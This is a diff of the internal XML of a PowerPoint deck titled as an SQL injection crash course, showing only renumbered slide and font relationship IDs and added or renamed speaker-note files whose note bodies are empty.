--- a/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
+++ b/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
@@ -5,80 +5,84 @@
     <p:sldMasterId id="2147483674" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId31"/>
+    <p:notesMasterId r:id="rId35"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
-    <p:sldId id="259" r:id="rId3"/>
+    <p:sldId id="301" r:id="rId3"/>
     <p:sldId id="265" r:id="rId4"/>
-    <p:sldId id="292" r:id="rId5"/>
-    <p:sldId id="268" r:id="rId6"/>
-    <p:sldId id="288" r:id="rId7"/>
-    <p:sldId id="266" r:id="rId8"/>
-    <p:sldId id="289" r:id="rId9"/>
-    <p:sldId id="270" r:id="rId10"/>
-    <p:sldId id="290" r:id="rId11"/>
-    <p:sldId id="287" r:id="rId12"/>
+    <p:sldId id="268" r:id="rId5"/>
+    <p:sldId id="288" r:id="rId6"/>
+    <p:sldId id="266" r:id="rId7"/>
+    <p:sldId id="289" r:id="rId8"/>
+    <p:sldId id="270" r:id="rId9"/>
+    <p:sldId id="294" r:id="rId10"/>
+    <p:sldId id="298" r:id="rId11"/>
+    <p:sldId id="290" r:id="rId12"/>
     <p:sldId id="286" r:id="rId13"/>
-    <p:sldId id="284" r:id="rId14"/>
-    <p:sldId id="283" r:id="rId15"/>
-    <p:sldId id="269" r:id="rId16"/>
-    <p:sldId id="291" r:id="rId17"/>
-    <p:sldId id="272" r:id="rId18"/>
-    <p:sldId id="278" r:id="rId19"/>
-    <p:sldId id="276" r:id="rId20"/>
-    <p:sldId id="277" r:id="rId21"/>
-    <p:sldId id="280" r:id="rId22"/>
-    <p:sldId id="279" r:id="rId23"/>
-    <p:sldId id="281" r:id="rId24"/>
-    <p:sldId id="282" r:id="rId25"/>
-    <p:sldId id="258" r:id="rId26"/>
-    <p:sldId id="273" r:id="rId27"/>
-    <p:sldId id="274" r:id="rId28"/>
-    <p:sldId id="285" r:id="rId29"/>
-    <p:sldId id="264" r:id="rId30"/>
+    <p:sldId id="287" r:id="rId14"/>
+    <p:sldId id="284" r:id="rId15"/>
+    <p:sldId id="296" r:id="rId16"/>
+    <p:sldId id="283" r:id="rId17"/>
+    <p:sldId id="297" r:id="rId18"/>
+    <p:sldId id="291" r:id="rId19"/>
+    <p:sldId id="272" r:id="rId20"/>
+    <p:sldId id="278" r:id="rId21"/>
+    <p:sldId id="295" r:id="rId22"/>
+    <p:sldId id="276" r:id="rId23"/>
+    <p:sldId id="277" r:id="rId24"/>
+    <p:sldId id="280" r:id="rId25"/>
+    <p:sldId id="279" r:id="rId26"/>
+    <p:sldId id="281" r:id="rId27"/>
+    <p:sldId id="299" r:id="rId28"/>
+    <p:sldId id="282" r:id="rId29"/>
+    <p:sldId id="273" r:id="rId30"/>
+    <p:sldId id="285" r:id="rId31"/>
+    <p:sldId id="300" r:id="rId32"/>
+    <p:sldId id="258" r:id="rId33"/>
+    <p:sldId id="264" r:id="rId34"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
   <p:notesSz cx="6858000" cy="9144000"/>
   <p:embeddedFontLst>
     <p:embeddedFont>
       <p:font typeface="Anonymous Pro" panose="020B0604020202020204" charset="0"/>
-      <p:regular r:id="rId32"/>
-      <p:bold r:id="rId33"/>
-      <p:italic r:id="rId34"/>
-      <p:boldItalic r:id="rId35"/>
-    </p:embeddedFont>
-    <p:embeddedFont>
-      <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId36"/>
       <p:bold r:id="rId37"/>
       <p:italic r:id="rId38"/>
       <p:boldItalic r:id="rId39"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId40"/>
       <p:bold r:id="rId41"/>
       <p:italic r:id="rId42"/>
       <p:boldItalic r:id="rId43"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId44"/>
       <p:bold r:id="rId45"/>
       <p:italic r:id="rId46"/>
       <p:boldItalic r:id="rId47"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId48"/>
       <p:bold r:id="rId49"/>
       <p:italic r:id="rId50"/>
       <p:boldItalic r:id="rId51"/>
     </p:embeddedFont>
     <p:embeddedFont>
+      <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
+      <p:regular r:id="rId52"/>
+      <p:bold r:id="rId53"/>
+      <p:italic r:id="rId54"/>
+      <p:boldItalic r:id="rId55"/>
+    </p:embeddedFont>
+    <p:embeddedFont>
       <p:font typeface="Comic Mono" pitchFamily="1" charset="0"/>
-      <p:regular r:id="rId52"/>
+      <p:regular r:id="rId56"/>
     </p:embeddedFont>
   </p:embeddedFontLst>
   <p:defaultTextStyle>
@@ -882,6 +886,133 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4375FD9-E6F8-01CC-90F2-02FDB7B5CADA}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD51453E-509E-ED50-48A0-0F50E91AA624}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB6A4271-DE56-AAB0-5DFE-5DFD9F6B1769}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3931723519"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide11.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE4F274-AB73-A195-1FED-1C9869BDFEB8}"/>
             </a:ext>
           </a:extLst>
@@ -992,133 +1123,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2196093219"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide11.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 124">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6D14E8-39C7-7811-2630-A65BB730743C}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363E8969-94E5-9EE8-D9F1-57985E911D01}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD4B74C-710F-861F-A3B9-C1F6D8D1E02C}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="481848101"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -1263,6 +1267,133 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6D14E8-39C7-7811-2630-A65BB730743C}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363E8969-94E5-9EE8-D9F1-57985E911D01}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD4B74C-710F-861F-A3B9-C1F6D8D1E02C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="481848101"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7702CEBB-D719-AE3F-4687-A4E1409F6C53}"/>
             </a:ext>
           </a:extLst>
@@ -1382,7 +1513,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide14.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFC5CE6-CB46-34E4-5BCC-24E1BD006850}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF39DAB3-7897-4133-E0B3-BB3F7BC54E5A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B041AA0-DA76-8F04-C98C-567399E77A9A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="739832916"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide16.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -1509,7 +1767,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide15.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide17.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -1517,7 +1775,7 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A446B246-DDC7-1232-A493-5B351CB4BB0A}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57631F58-7090-E297-6064-5525D03E5B99}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -1537,7 +1795,7 @@
           <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF93CBD1-EAA3-E86F-C282-CF8E28C75390}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7965423D-55C7-D774-148D-91AB5C5AEB47}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -1584,7 +1842,7 @@
           <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A3F9AB-99B1-6993-D869-91512D54CA3B}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69DCF671-B4DC-80AF-20D7-74FB81B449C9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -1626,7 +1884,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1842267641"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3666705642"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -1636,7 +1894,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide16.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide18.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -1763,7 +2021,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide17.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide19.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -1890,7 +2148,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide18.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
